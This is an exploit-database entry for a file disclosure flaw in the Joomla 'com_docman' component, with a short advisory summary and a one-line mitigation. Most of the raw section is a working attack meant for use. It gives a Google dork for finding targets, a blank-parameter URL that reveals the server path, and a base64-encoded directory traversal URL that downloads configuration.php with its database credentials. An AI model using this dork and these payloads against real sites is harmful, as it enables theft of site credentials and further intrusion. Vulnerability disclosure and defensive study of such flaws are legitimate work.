Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

vendor:

docman Component

by:

Hugo Santiago dos Santos

7.5

CVSS

HIGH

Full Path Disclosure & Local File Disclosure/Include

200, 98

CWE

Product Name: docman Component

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Joomla docman Component ‘com_docman’ Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)

Joomla docman Component 'com_docman' is vulnerable to Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI). An attacker can exploit this vulnerability to gain access to sensitive information such as the server path and configuration file. The vulnerability is due to the lack of proper input validation when handling user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. The FPD vulnerability can be exploited by sending a request with a blank parameter to the vulnerable application. The LFD/LFI vulnerability can be exploited by sending a request with a malicious parameter to the vulnerable application.

Mitigation:

Input validation should be performed to ensure that user-supplied input is properly sanitized. Access to sensitive files should be restricted.

Source

Exploit-DB raw data:

# Joomla docman Component 'com_docman' Full Path Disclosure(FPD) & Local File Disclosure/Include(LFD/LFI)
# CWE: CWE-200(FPD) CWE-98(LFI/LFD)
# Risk: High
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.org
# Date: 13/07/2015
# Vendor Homepage: http://extensions.joomla.org/extension/directory-a-documentation/downloads/docman
# Google Dork: inurl:"/components/com_docman/dl2.php"

# Xploit (FPD): 
 
 Get one target and just download with blank parameter: 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=
 
 In title will occur Full Path Disclosure of server.
 
# Xploit (LFD/LFI):

 http://www.site.com/components/com_docman/dl2.php?archive=0&file=[LDF]
 
 Let's Xploit...
 
 First we need use Xploit FPD to see the path of target, after that we'll Insert 'configuration.php' configuration database file and encode in Base64:
 
 ../../../../../../../target/www/configuration.php <= Not Ready
 
 http://www.site.com/components/com_docman/dl2.php?archive=0&file=Li4vLi4vLi4vLi4vLi4vLi4vLi4vdGFyZ2V0L3d3dy9jb25maWd1cmF0aW9uLnBocA==  <= Ready !
 

And Now we have a configuration file...